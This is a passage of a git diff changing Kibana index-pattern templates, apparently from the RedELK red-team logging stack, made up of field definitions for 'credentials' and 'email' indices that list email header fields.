\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"message\"}}},{\"name\":\"tags\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"tags.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"tags\"}}}]", "timeFieldName": "@timestamp", "title": "credentials-*"}, "coreMigrationVersion": "7.16.2", "id": "credentials", "migrationVersion": {"index-pattern": "7.11.0"}, "references": [], "sort": [1642152839362, 1858], "type": "index-pattern", "version": "1"} \ No newline at end of file diff --git a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_email.ndjson b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_email.ndjson index e35579cc..a23bc9dc 100644 --- a/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_email.ndjson +++ b/elkserver/docker/redelk-base/redelkinstalldata/templates/redelk_kibana_index-pattern_email.ndjson @@ -1 +1 @@ -{"attributes": {"fields": "[{\"name\":\"@timestamp\",\"type\":\"date\",\"esTypes\":[\"date\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"name\":\"@version\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"@version.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"@version\"}}},{\"name\":\"_id\",\"type\":\"string\",\"esTypes\":[\"_id\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"_index\",\"type\":\"string\",\"esTypes\":[\"_index\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"_score\",\"type\":\"number\",\"count\":0,\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"_source\",\"type\":\"_source\",\"esTypes\":[\"_source\"],\"count\":0,\"scripted\":false,\"searchable\":false,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"_type\",\"type\":\"string\",\"esTypes\":[\"_type\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"accept-language\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"accept-language.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"accept-language\"}}},{\"name\":\"arc-authentication-results\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"arc-authentication-results.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"arc-authentication-results\"}}},{\"name\":\"arc-message-signature\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"arc-message-signature.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"arc-message-signature\"}}},{\"name\":\"arc-seal\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"arc-seal.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"arc-seal\"}}},{\"name\":\"attackscenario\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"attackscenario.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"attackscenario\"}}},{\"name\":\"authentication-results\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"authentication-results-original\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"authentication-results-original.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"authentication-results-original\"}}},{\"name\":\"authentication-results.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"authentication-results\"}}},{\"name\":\"content-language\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"content-language.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"content-language\"}}},{\"name\":\"content-transfer-encoding\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"content-transfer-encoding.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"content-transfer-encoding\"}}},{\"name\":\"content-type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"content-type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"content-type\"}}},{\"name\":\"date\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"date.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"date\"}}},{\"name\":\"dkim-signature\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"dkim-signature.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"dkim-signature\"}}},{\"name\":\"emailfolder\",\"type\":\"string\",\"esTypes\":[\"text\",\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":false},{\"name\":\"emailfolder.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"emailfolder\"}}},{\"name\":\"feedback-id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"feedback-id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"feedback-id\"}}},{\"name\":\"from\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"from.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"from\"}}},{\"name\":\"in-reply-to\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"in-reply-to.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"in-reply-to\"}}},{\"name\":\"infra.attack_scenario\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"name\":\"infra.log_type\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true},{\"name\":\"infralogtype\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"infralogtype.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"infralogtype\"}}},{\"name\":\"message\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"message-id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"message-id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"message-id\"}}},{\"name\":\"message.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"message\"}}},{\"name\":\"mime-version\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"mime-version.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"mime-version\"}}},{\"name\":\"received\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"received-spf\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"received-spf.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"received-spf\"}}},{\"name\":\"received.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"received\"}}},{\"name\":\"references\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"references.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"references\"}}},{\"name\":\"return-path\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"return-path.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"return-path\"}}},{\"name\":\"subject\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"subject.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"subject\"}}},{\"name\":\"thread-index\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"thread-index.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"thread-index\"}}},{\"name\":\"thread-topic\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"thread-topic.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"thread-topic\"}}},{\"name\":\"to\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"to.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"to\"}}},{\"name\":\"x-account-notification-type\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-account-notification-type.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-account-notification-type\"}}},{\"name\":\"x-eopattributedmessage\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-eopattributedmessage.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-eopattributedmessage\"}}},{\"name\":\"x-eoptenantattributedmessage\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-eoptenantattributedmessage.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-eoptenantattributedmessage\"}}},{\"name\":\"x-forefront-antispam-report-untrusted\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-forefront-antispam-report-untrusted.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-forefront-antispam-report-untrusted\"}}},{\"name\":\"x-gm-message-state\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-gm-message-state.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-gm-message-state\"}}},{\"name\":\"x-google-dkim-signature\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-google-dkim-signature.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-google-dkim-signature\"}}},{\"name\":\"x-google-smtp-source\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-google-smtp-source.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-google-smtp-source\"}}},{\"name\":\"x-incomingheadercount\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-incomingheadercount.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-incomingheadercount\"}}},{\"name\":\"x-incomingtopheadermarker\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-incomingtopheadermarker.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-incomingtopheadermarker\"}}},{\"name\":\"x-message-delivery\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-message-delivery.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-message-delivery\"}}},{\"name\":\"x-message-info\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-message-info.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-message-info\"}}},{\"name\":\"x-microsoft-antispam\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-microsoft-antispam-mailbox-delivery\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-microsoft-antispam-mailbox-delivery.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-microsoft-antispam-mailbox-delivery\"}}},{\"name\":\"x-microsoft-antispam-message-info\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-microsoft-antispam-message-info-original\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-microsoft-antispam-message-info-original.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-microsoft-antispam-message-info-original\"}}},{\"name\":\"x-microsoft-antispam-message-info.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-microsoft-antispam-message-info\"}}},{\"name\":\"x-microsoft-antispam-prvs\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-microsoft-antispam-prvs.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-microsoft-antispam-prvs\"}}},{\"name\":\"x-microsoft-antispam-untrusted\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-microsoft-antispam-untrusted.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-microsoft-antispam-untrusted\"}}},{\"name\":\"x-microsoft-antispam.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-microsoft-antispam\"}}},{\"name\":\"x-ms-exchange-antispam-messagedata\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-antispam-messagedata-original\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-antispam-messagedata-original.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-antispam-messagedata-original\"}}},{\"name\":\"x-ms-exchange-antispam-messagedata.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-antispam-messagedata\"}}},{\"name\":\"x-ms-exchange-authentication-results\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-authentication-results.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-authentication-results\"}}},{\"name\":\"x-ms-exchange-crosstenant-authas\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-authas.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-authas\"}}},{\"name\":\"x-ms-exchange-crosstenant-authsource\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-authsource.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-authsource\"}}},{\"name\":\"x-ms-exchange-crosstenant-fromentityheader\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-fromentityheader.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-fromentityheader\"}}},{\"name\":\"x-ms-exchange-crosstenant-id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-id\"}}},{\"name\":\"x-ms-exchange-crosstenant-network-message-id\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-network-message-id.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-network-message-id\"}}},{\"name\":\"x-ms-exchange-crosstenant-originalarrivaltime\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-originalarrivaltime.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-originalarrivaltime\"}}},{\"name\":\"x-ms-exchange-crosstenant-originalattributedtenantconnectingip\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-originalattributedtenantconnectingip.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-originalattributedtenantconnectingip\"}}},{\"name\":\"x-ms-exchange-crosstenant-rms-persistedconsumerorg\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-crosstenant-rms-persistedconsumerorg.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-crosstenant-rms-persistedconsumerorg\"}}},{\"name\":\"x-ms-exchange-eopdirect\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-eopdirect.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-eopdirect\"}}},{\"name\":\"x-ms-exchange-minimumurldomainage\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":false,\"readFromDocValues\":false},{\"name\":\"x-ms-exchange-minimumurldomainage.keyword\",\"type\":\"string\",\"esTypes\":[\"keyword\"],\"count\":0,\"scripted\":false,\"searchable\":true,\"aggregatable\":true,\"readFromDocValues\":true,\"subType\":{\"multi\":{\"parent\":\"x-ms-exchange-minimumurldomainage\"}}},{\"name\":\"x-ms-exchange-organization-authas\",\"type\":\"string\",\"esTypes\":[\"text\"],\"count\":0,\"scripted\":false,\"search